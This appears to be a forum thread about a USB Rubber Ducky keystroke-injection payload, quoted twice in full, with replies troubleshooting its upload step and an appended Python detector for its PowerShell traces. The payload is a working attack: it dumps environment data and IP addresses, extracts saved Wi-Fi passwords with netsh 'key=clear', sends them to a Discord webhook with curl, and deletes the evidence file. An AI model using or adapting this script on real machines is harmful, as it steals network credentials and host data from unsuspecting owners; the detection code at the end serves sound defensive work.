Powershell Issue


Recommended Posts

I was trying to run the Discord Windows Wifi on my new MK II Rubber Ducky, and when I generated the inject.bin I get the powershell to show up, but the Payload never sends the command to powershell. The window stays open and I can see another command line as if the enter key was sent, but not the string. I went through and tried it manually, and it sends the webhook to Discord when I cut and paste in PS, but now with the ducky. Might be an issue with the Payload Studio.


REM Title:          Discord Windows Wifi IP-Info
REM Description:    Grabs wifi passwords, environment data, IPv4 Network addresses, writes to a file, uploads it to Discord, then cleans up the file on the target's filesystem and exits.
REM Author:         Startrk1995
REM Props:          Hak5 Team
REM Version:        1.0
REM Category:       Exfiltration
REM Target:         Windows 10 (CMD + Powershell)
REM Attackmodes:    HID
REM Mandatory Info: Add your Discord Webhook URL in quotes with no spaces and with permission to post.
REM Discord URL:    Example: https://discord.com/api/webhooks/123456789012345678/adjlfjlejlidsjasdlijflie_ajsdflkjaljeiljkdajlkjd
REM Legal:          This script is for educational purposes only please do not use this for malicious purposes

DELAY 500
GUI r
DELAY 200
STRING powershell
ENTER
DELAY 1000

REM I have this as all one command for quickness.

STRING $url="https://discord.com/api/webhooks/REMOVEDFROMPOST";dir env: >> stats.txt; Get-NetIPAddress -AddressFamily IPv4 | Select-Object IPAddress,SuffixOrigin | where IPAddress -notmatch '(127.0.0.1|169.254.\d+.\d+)' >> stats.txt;(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)}  | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{PROFILE_NAME=$name;PASSWORD=$pass}} | Format-Table -AutoSize >> stats.txt;$Body=@{ content = "$env:computername Stats from Ducky/Pico"};Invoke-RestMethod -ContentType 'Application/Json' -Uri $url  -Method Post -Body ($Body | ConvertTo-Json);curl.exe -F "file1=@stats.txt" $url ; Remove-Item '.\stats.txt';exit
ENTER


Thanks again,

Emilio


  • 2 weeks later...
On 8/20/2022 at 1:48 AM, Emilio5639 said:

I was trying to run the Discord Windows Wifi on my new MK II Rubber Ducky, and when I generated the inject.bin I get the powershell to show up, but the Payload never sends the command to powershell. The window stays open and I can see another command line as if the enter key was sent, but not the string. I went through and tried it manually, and it sends the webhook to Discord when I cut and paste in PS, but now with the ducky. Might be an issue with the Payload Studio.

REM Title:          Discord Windows Wifi IP-Info
REM Description:    Grabs wifi passwords, environment data, IPv4 Network addresses, writes to a file, uploads it to Discord, then cleans up the file on the target's filesystem and exits.
REM Author:         Startrk1995
REM Props:          Hak5 Team
REM Version:        1.0
REM Category:       Exfiltration
REM Target:         Windows 10 (CMD + Powershell)
REM Attackmodes:    HID
REM Mandatory Info: Add your Discord Webhook URL in quotes with no spaces and with permission to post.
REM Discord URL:    Example: https://discord.com/api/webhooks/123456789012345678/adjlfjlejlidsjasdlijflie_ajsdflkjaljeiljkdajlkjd
REM Legal:          This script is for educational purposes only please do not use this for malicious purposes

DELAY 500
GUI r
DELAY 200
STRING powershell
ENTER
DELAY 1000

REM I have this as all one command for quickness.

STRING $url="https://discord.com/api/webhooks/REMOVEFROMPOST";dir env: >> stats.txt; Get-NetIPAddress -AddressFamily IPv4 | Select-Object IPAddress,SuffixOrigin | where IPAddress -notmatch '(127.0.0.1|169.254.\d+.\d+)' >> stats.txt;(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{PROFILE_NAME=$name;PASSWORD=$pass}} | Format-Table -AutoSize >> stats.txt;$Body=@{ content = "$env:computername Stats from Ducky/Pico"};Invoke-RestMethod -ContentType 'Application/Json' -Uri $url -Method Post -Body ($Body | ConvertTo-Json);curl.exe -F "file1=@stats.txt" $url ; Remove-Item '.\stats.txt';exit
ENTER

Thanks again,

Emilio

Hi, I'm currently trying to transfer data to Discord and found that the command

curl.exe -F "file1=@stats.txt" $url;

is not working. The "-F" parameter doesn't seem to exist. How exactly did you solve the problem? I would also like to transfer a text file to Discord, but I haven't been able to fix the problem yet. I've also tried encoding it with Base64 and passing it as a single-line variable (string). Unfortunately, it is usually over 2000 characters.

Do you have a solution for me?

Thanks in advance!


Not sure if you got the answer on Discord, but if the "true" curl binary hasn't been installed on the Windows system, it's simply an alias for Invoke-WebRequest so you can probably not expect it to work as the real curl command in every aspect.

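As an added defensive example (not code from this thread, from Hak5 or from the payload's author), here is a small Python scorer that runs over constructed PowerShell script-block log text (Event ID 4104 style) and flags the combination of indicators the payload above leaves behind: netsh wlan ... key=clear, the Key Content parse, a Discord webhook URL, a curl multipart upload, the env: dump and the staging-file cleanup. The rule weights and the alert threshold are assumed tuning values, not anything from the page.

```python
import re
from typing import Dict, List

# Constructed sample script-block texts (Event ID 4104 style), not real telemetry.
# The second one mirrors the one-liner discussed in the thread, with a placeholder webhook.
SAMPLE_SCRIPT_BLOCKS = [
    "Get-ChildItem C:\\Users | Measure-Object",
    ('$url="https://discord.com/api/webhooks/000000000000000000/PLACEHOLDER";'
     'dir env: >> stats.txt; Get-NetIPAddress -AddressFamily IPv4 >> stats.txt;'
     '(netsh wlan show profiles) | Select-String "\\:(.+)$" | '
     '%{(netsh wlan show profile name="$name" key=clear)} | '
     'Select-String "Key Content\\W+\\:(.+)$" >> stats.txt;'
     'curl.exe -F "file1=@stats.txt" $url; Remove-Item \'.\\stats.txt\';exit'),
    "netsh wlan show profiles",  # benign on its own: no key=clear, no upload
]

# (name, weight, case-insensitive regex). Weights are assumed values reflecting how
# specific each indicator is to credential harvesting plus webhook exfiltration.
RULES = [
    ("wlan_key_clear", 3, re.compile(r"netsh\s+wlan\s+show\s+profile\b.*key\s*=\s*clear", re.I)),
    ("wlan_key_content_parse", 2, re.compile(r"Key\s+Content", re.I)),
    ("discord_webhook", 3, re.compile(r"discord(?:app)?\.com/api/webhooks/", re.I)),
    ("curl_multipart_upload", 2, re.compile(r"\bcurl(?:\.exe)?\s+.*-F\s+[\"']?\w+=@", re.I)),
    ("env_dump_to_file", 1, re.compile(r"\b(?:dir|Get-ChildItem|gci)\s+env:.*>>", re.I)),
    ("delete_staging_file", 1, re.compile(r"Remove-Item\b.*\.txt", re.I)),
]

ALERT_THRESHOLD = 5  # assumed: a single weak indicator never alerts, the combination does


def score_script_block(block: str) -> Dict[str, object]:
    """Return the matched rule names, the summed weight and whether it crosses the threshold."""
    hits = [name for name, _, rx in RULES if rx.search(block)]
    score = sum(weight for name, weight, _ in RULES if name in hits)
    return {"hits": hits, "score": score, "alert": score >= ALERT_THRESHOLD}


def scan(blocks: List[str]) -> List[Dict[str, object]]:
    """Score every script block; callers would feed in 4104 event messages here."""
    return [score_script_block(b) for b in blocks]


if __name__ == "__main__":
    for i, result in enumerate(scan(SAMPLE_SCRIPT_BLOCKS)):
        print(i, result)  # block 1 scores 12 and alerts; blocks 0 and 2 score 0
```

Because the payload writes everything to one staging file and uploads it in the same script block, scoring the block as a whole catches the chain even when each command would be unremarkable on its own.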
